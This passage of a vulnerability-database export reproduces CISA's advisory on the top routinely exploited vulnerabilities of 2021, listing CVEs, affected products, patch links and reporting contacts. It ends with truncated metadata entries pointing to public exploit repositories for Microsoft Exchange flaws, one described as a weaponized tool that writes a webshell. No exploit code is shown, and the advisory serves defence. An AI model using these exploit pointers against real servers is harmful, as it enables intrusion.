\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>)\n\n| \n\n[Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>)\n\n| \n \n[CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)\n\n| \n\n[Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)\n\n| \n\nJoint CSA [Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>)\n\nCCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched \u2013 Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n| \n\nMicrosoft \n\n| \n\nMicrosoft Exchange Server 2013 Cumulative Update 23\n\nMicrosoft Exchange Server 2016 Cumulative Updates 19 and 20\n\nMicrosoft Exchange Server 2019 Cumulative Updates 8 and 9\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>)\n\n| \n\nJoint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>)\n\nACSC Alert [Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/acsc/view-all-content/alerts/microsoft-exchange-proxyshell-targeting-australia>) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Exchange Server versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple Exchange Server versions; see [Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>)\n\n| \n\n[Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) \n \n[CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>)\n\n| \n\nSudo\n\n| \n\nSudo before 1.9.5p2\n\n| \n\n[Sudo Stable Release 1.9.5p2](<https://www.sudo.ws/releases/stable/#1.9.5p2>)\n\n| \n \n[CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>)\n\n| \n\nCheckbox Survey\n\n| \n\nCheckbox Survey versions prior to 7\n\n| \n\n| \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nMultiple versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>)\n\n| \n\nCISA Alert: [Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-062a>)\n\nACSC Advisory [Active exploitation of Vulnerable Microsoft Exchange servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-002-active-exploitation-vulnerable-microsoft-exchange-servers>)\n\nCCCS Alert [Active Exploitation of Microsoft Exchange Vulnerabilities - Update 4](<https://www.cyber.gc.ca/en/alerts/active-exploitation-microsoft-exchange-vulnerabilities>) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>) \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)\n\n| \n\nJira Atlassian \n\n| \n\nConfluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n| \n\n[Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)\n\n| \n\nACSC Alert [Remote code execution vulnerability present in certain versions of Atlassian Confluence](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence>)\n\nCCCS [Atlassian Security Advisory](<https://www.cyber.gc.ca/en/alerts/atlassian-security-advisory>) \n \n[CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>)\n\n| \n\nPulse Secure \n\n| \n\nPCS 9.0R3/9.1R1 and Higher\n\n| \n\n[Pulse Secure SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>)\n\n| \n\nCCCS Alert [Active Exploitation of Pulse Connect Secure Vulnerabilities - Update 1](<https://www.cyber.gc.ca/en/alerts/active-exploitation-pulse-connect-secure-vulnerabilities>) \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>)\n\n| \n\nSonicWall \n\n| \n\nSMA 100 devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v)\n\n| \n\n[SonicWall Security Advisory SNWLID-2021-0001](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001>)\n\n| \n \n[CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>)\n\n| \n\nMicrosoft\n\n| \n\nMultiple Windows products; see [Microsoft Security Update Guide Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)\n\n| \n\n[Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>)\n\n| \n\nCCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched \u2013 Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) \n \n[CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>)\n\n| \n\nQNAP \n\n| \n\nQTS, multiple versions; see [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>)\n\nQuTS hero h4.5.1.1491 build 20201119 and later\n\n| \n\n[QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>)\n\n| \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\n\n| \n\nMicrosoft \n\n| \n\nWindows Server, multiple versions; see [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n\n| \n\n[Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n\n| \n\nACSC Alert [Netlogon elevation of privilege vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCCCS Alert [Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\nMicrosoft \n\n| \n\nExchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n\n| \n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nJoint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>)\n\nCCCS Alert [Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://www.cyber.gc.ca/en/alerts/microsoft-exchange-validation-key-remote-code-execution-vulnerability>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\nCitrix \n\n| \n\nADC and Gateway version 13.0 all supported builds before 13.0.47.24\n\nNetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12\n\nSD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b\n\n| \n\n[Citrix Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>)\n\n| \n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nCCCS Alert [Detecting Compromises relating to Citrix CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0>) \n \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n\n| \n\nProgress Telerik \n\n| \n\nUI for ASP.NET AJAX through 2019.3.1023\n\n| \n\n[Telerik UI for ASP.NET AJAX Allows JavaScriptSerializer Deserialization](<https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization>)\n\n| \n\nACSC Alert [Active exploitation of vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\nPulse Secure \n\n| \n\nPulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n\n| \n\n[Pulse Secure: SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n| \n\nCISA Alert [Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa20-010a>)\n\nCISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n\nACSC Advisory [Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nCCCS [Alert APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n\n| \n\nFortinet\n\n| \n\nFortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6\n\n| \n\n[Fortinet FortiGuard Labs: FG-IR-20-233](<https://www.fortiguard.com/psirt/FG-IR-20-233>)\n\n| \n\nJoint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>)\n\nJoint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nACSC Alert [APT exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)\n\nCCCS Alert [Exploitation of Fortinet FortiOS vulnerabilities (CISA, FBI) - Update 1](<https://www.cyber.gc.ca/en/alerts/exploitation-fortinet-fortios-vulnerabilities-cisa-fbi>) \n \n[CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>)\n\n| \n\nCisco \n\n| \n\nSee [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>)\n\n| \n\n[Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>)\n\n| \n\nCCCS [Action Required to Secure the Cisco IOS and IOS XE Smart Install Feature](<https://www.cyber.gc.ca/en/alerts/action-required-secure-cisco-ios-and-ios-xe-smart-install-feature>) \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n\n| \n\nMicrosoft \n\n| \n\nOffice, multiple versions; see [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)\n\n| \n\nCCCS Alert [Microsoft Office Security Update](<https://www.cyber.gc.ca/en/alerts/microsoft-office-security-update>) \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple products; see [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>)\n\n| \n\nCCCS [Microsoft Security Updates](<https://www.cyber.gc.ca/en/alerts/microsoft-security-updates>) \n \n### Contact Information\n\n**U.S. organizations: **all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at [report@cisa.gov ](<mailto:report@cisa.gov>)or (888) 282-0870 and/or to the FBI via your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI\u2019s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). **Australian organizations:** visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. **Canadian organizations:** report incidents by emailing CCCS at [contact@cyber.gc.ca](<mailto:contact@cyber.gc.ca>). **New Zealand organizations:** report cyber security incidents to [incidents@ncsc.govt.nz](<mailto:incidents@ncsc.govt.nz>) or call 04 498 7654. **United Kingdom organizations:** report a significant cyber security incident: [ncsc.gov.uk/report-an-incident](<https://www.ncsc.gov.uk/section/about-this-website/contact-us>) (monitored 24 hours) or, for urgent assistance, call 03000 200 973.\n\n### Revisions\n\nApril 27, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T12:00:00", "type": "ics", "title": "2021 Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0171", "CVE-2018-13379", "CVE-2019-11510", "CVE-2019-18935", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-2509", "CVE-2021-1675", "CVE-2021-20016", "CVE-2021-20038", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27852", "CVE-2021-31207", "CVE-2021-3156", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35464", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-42237", "CVE-2021-44228"], "modified": "2022-04-28T12:00:00", "id": "AA22-117A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-18T01:31:00", "description": "## weaponized tool for CVE-2020-17144(Microsoft Exchange 2010 MR...", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-12-09T20:57:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2022-07-03T16:01:53", "id": "AC621762-B940-53F9-B9DB-34B015F55B87", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-14T20:42:22", "description": "# CVE-2020-17144-EXP\n\n```\n\u6761\u4ef6: Exchange2010; \u666e\u901a\u7528\u6237\n\u9ed8\u8ba4\u7528\u6cd5(\u5199webshell)...", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-12-09T10:30:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2022-07-14T14:52:00", "id": "A1463971-12CC-5B11-99E8-018B541F4F71", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:24", "description": "[![made-with-bash](https://img.shields.io/badge/Made%20with-Bash...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T15:16:24", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-03-20T06:54:20", "id": "F1CA855B-967C-5A5E-9256-FDDE87702713", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T20:18:15", "description": "# cve-2020-0688\nUsage:\n```\nusage: cve-2020-0688.py [-h] -s SERVE...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-27T02:54:27", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2022-08-15T15:41:33", "id": "AAC2853C-A655-5E80-9262-A654102B874A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T17:57:08", "description": "# Exchange Remote Code Execution (cve-2020-0688) - RED TEAM [MOD...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-12T08:28:35", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2022-07-02T07:14:36", "id": "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:51:57", "description": "<b>[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 